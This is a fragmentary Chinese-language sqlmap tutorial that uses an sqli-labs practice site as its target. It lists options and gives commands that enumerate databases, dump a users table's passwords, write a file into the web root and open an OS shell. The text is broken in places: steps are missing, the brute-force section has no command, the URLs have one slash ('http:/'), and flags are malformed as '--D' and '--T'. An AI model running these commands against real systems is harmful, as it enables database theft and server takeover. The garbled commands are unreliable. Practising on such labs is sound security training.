2023年11月28日发(作者:)

sqlmap详细使⽤教程

⽬录

--cookie-del= 指定cookie分隔符

--os= 指定DBMS操作系统

--roles 枚举DBMS⽤户的⾓⾊

--csv-del= 指定CSV输出中使⽤的的字符

--dump-format= 储存数据的⽅式(CSV(default),HTML,SQLITE)

--flush-session 刷新当前⽬标的会话⽂件

--fresh-queries 忽略会话⽂件中储存的查询结果,重新查询

--hex 使⽤DBMS hex函数进⾏数据检索

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1" --data="id=1"

实例演⽰-获取数据库信息

1.查看数据库

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --dbs --batch

2.查看数据库⾥⾯的表

4.查看数据库列⾥⾯的具体的值

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --D security --T users -C password --

dump --batch

实例演⽰-暴⼒破解

使⽤条件:

数据库版本⼩于5.0,没有information——schema表。

2写⼊⽂件

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --file-write "/root/"

--file-dest "C:/phpstudy/PHPTutorial/www/"

实例演⽰-获取shell

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --os-shell